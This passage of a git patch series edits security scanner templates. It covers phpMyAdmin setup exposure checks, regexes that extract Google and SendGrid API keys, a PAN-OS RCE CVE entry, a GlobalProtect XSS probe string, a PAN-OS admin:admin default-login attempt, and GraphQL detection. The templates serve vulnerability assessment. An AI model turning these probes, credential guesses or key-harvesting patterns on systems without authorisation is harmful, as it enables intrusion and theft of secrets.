@@ requests: - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" + - "{{BaseURL}}/phpmyadmin/setup/index.php" stop-at-first-match: true matchers-condition: and @@ -24,7 +25,9 @@ requests: - type: word words: - "You want to configure phpMyAdmin using web interface" + - "phpMyAdmin setup" + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From 7bbb9de4843b71117bc4c423487985a45e4fd5cd Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:15:39 -0500 Subject: [PATCH 19/25] correct template id name collisions --- file/keys/credential-exposure.yaml | 2 +- file/keys/google-api.yaml | 4 ++-- file/keys/sendgrid-api.yaml | 4 ++-- token-spray/google-placedetails.yaml | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) 
diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 40b98b7fab..71ed00a1ab 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -1,4 +1,4 @@ -id: credentials-disclosure +id: credentials-disclosure-file # Extract secrets regex like api keys, password, token, etc ... for different services # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. diff --git a/file/keys/google-api.yaml b/file/keys/google-api.yaml index c227c5263b..8fc2776945 100644 --- a/file/keys/google-api.yaml +++ b/file/keys/google-api.yaml @@ -1,4 +1,4 @@ -id: google-api-key +id: google-api-key-file info: name: Google API key @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "AIza[0-9A-Za-z\\-_]{35}" \ No newline at end of file + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/file/keys/sendgrid-api.yaml b/file/keys/sendgrid-api.yaml index cf01b33d17..4b5c0e3c65 100644 --- a/file/keys/sendgrid-api.yaml +++ b/file/keys/sendgrid-api.yaml @@ -1,4 +1,4 @@ -id: sendgrid-api-key +id: sendgrid-api-key-file info: name: Sendgrid API Key @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" \ No newline at end of file + - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index 2f6cf7d464..b8605b6dde 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -1,4 +1,4 @@ -id: api-googlespeedlimit +id: api-google-place-details info: name: Google Place Details API Test From 878a74647ccd8949a3ebbcb78727678560becd5f Mon Sep 17 00:00:00 2001 
From: sandeep Date: Thu, 11 Nov 2021 22:04:45 +0530 Subject: [PATCH 20/25] misc updates --- .../{pma-server-import.yaml => phpmyadmin-server-import.yaml} | 0 misconfiguration/phpmyadmin/phpmyadmin-setup.yaml | 4 ++-- misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml | 2 ++ 3 files changed, 4 insertions(+), 2 deletions(-) rename misconfiguration/phpmyadmin/{pma-server-import.yaml => phpmyadmin-server-import.yaml} (100%) diff --git a/misconfiguration/phpmyadmin/pma-server-import.yaml b/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml similarity index 100% rename from misconfiguration/phpmyadmin/pma-server-import.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 7ab271dc14..383a94ea63 100644 --- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -2,9 +2,9 @@ id: phpmyadmin-setup info: name: Publicly Accessible Phpmyadmin Setup - author: sheikhrishad + author: sheikhrishad,thevillagehacker severity: medium - tags: misc + tags: phpmyadmin,misconfig requests: - method: GET diff --git a/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml index 0bb3cbb91c..fecbccc2c1 100644 --- a/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml @@ -14,6 +14,7 @@ requests: - "{{BaseURL}}/phpmyadmin/index.php?db=information_schema" - "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -21,6 +22,7 @@ requests: - "var db = 'information_schema';" - "var opendb_url = 'db_structure.php';" condition: and + - type: status status: - 200 From 65ce478c0ec4019c4d6169a289cf52fd283a22fb Mon Sep 17 00:00:00 2001 
From: sandeep Date: Thu, 11 Nov 2021 22:59:29 +0530 Subject: [PATCH 21/25] misc updates --- cves/2017/CVE-2017-15944.yaml | 4 ++-- cves/2018/CVE-2018-10141.yaml | 8 ++++---- default-logins/paloalto/panos-default-login.yaml | 6 +++--- exposed-panels/globalprotect-panel.yaml | 3 ++- 4 files changed, 11 insertions(+), 10 deletions(-) diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 41f4f5c82f..48553abee3 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -8,11 +8,11 @@ info: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: critical - tags: cve,cve2017,rce,vpn,paloalto,globalprotect classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2017-15944 + tags: cve,cve2017,rce,vpn,panos,globalprotect requests: - raw: @@ -24,9 +24,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "@start@Success@end@" - part: body - type: status status: diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index fe677ff879..577e38e5cb 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml @@ -2,16 +2,16 @@ id: CVE-2018-10141 info: name: GlobalProtect Login page XSS + severity: medium author: dhiyaneshDk description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML. - severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141 - tags: globalprotect,xss,cve,cve2018,vpn classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2018-10141 cwe-id: CWE-79 + tags: cve,cve2018,panos,vpn,globalprotect,xss requests: - method: GET 
@@ -21,14 +21,14 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - 'var valueUser = "j";-alert(1)-"x";' - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: diff --git a/default-logins/paloalto/panos-default-login.yaml b/default-logins/paloalto/panos-default-login.yaml index f7bac9f620..2e218f2bc2 100644 --- a/default-logins/paloalto/panos-default-login.yaml +++ b/default-logins/paloalto/panos-default-login.yaml @@ -6,7 +6,7 @@ info: severity: high description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. - tags: paloalto,panos,default-login + tags: panos,default-login requests: - raw: @@ -17,19 +17,19 @@ requests: user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork payloads: username: - admin password: - admin - attack: pitchfork matchers-condition: and matchers: - type: word + part: header words: - "Set-Cookie: PHPSESSID" - part: header - type: word words: diff --git a/exposed-panels/globalprotect-panel.yaml b/exposed-panels/globalprotect-panel.yaml index 6d6a03dfce..2f992eea88 100644 --- a/exposed-panels/globalprotect-panel.yaml +++ b/exposed-panels/globalprotect-panel.yaml @@ -4,7 +4,7 @@ info: name: PaloAlto Networks GlobalProtect Panel author: organiccrap severity: info - tags: panel + tags: panel,panos requests: - method: GET @@ -12,6 +12,7 @@ requests: - "{{BaseURL}}/global-protect/login.esp" - "{{BaseURL}}/sslmgr" + stop-at-first-match: true matchers: - type: word words: From 196470955845ac4f41ba62e55320dd2da0027ae4 Mon Sep 17 00:00:00 2001 
From: Pradeepch99 Date: Fri, 12 Nov 2021 11:27:26 +0530 Subject: [PATCH 22/25] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index 3c31133fed..ad4e2a97c4 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -145,6 +145,11 @@ requests: status: - 200 + - type: word + words: + - "Content-Type: application/json" + part: header + - type: regex regex: - "__schema" From 69a3ad0afb2125384350ed1ad64db8b5eac76d57 Mon Sep 17 00:00:00 2001 From: Pradeepch99 Date: Fri, 12 Nov 2021 11:39:28 +0530 Subject: [PATCH 24/25] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index ad4e2a97c4..b10a5913e2 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -149,7 +149,7 @@ requests: words: - "Content-Type: application/json" part: header - + - type: regex regex: - "__schema" From 7a30c6a982d46b75e4ec17ea8c223c033d1c600e Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 12 Nov 2021 12:55:49 +0530 Subject: [PATCH 25/25] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index b10a5913e2..f4c4be2de5 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -146,9 +146,9 @@ requests: - 200 - type: word - words: - - "Content-Type: application/json" part: header + words: + - "application/json" - type: regex regex: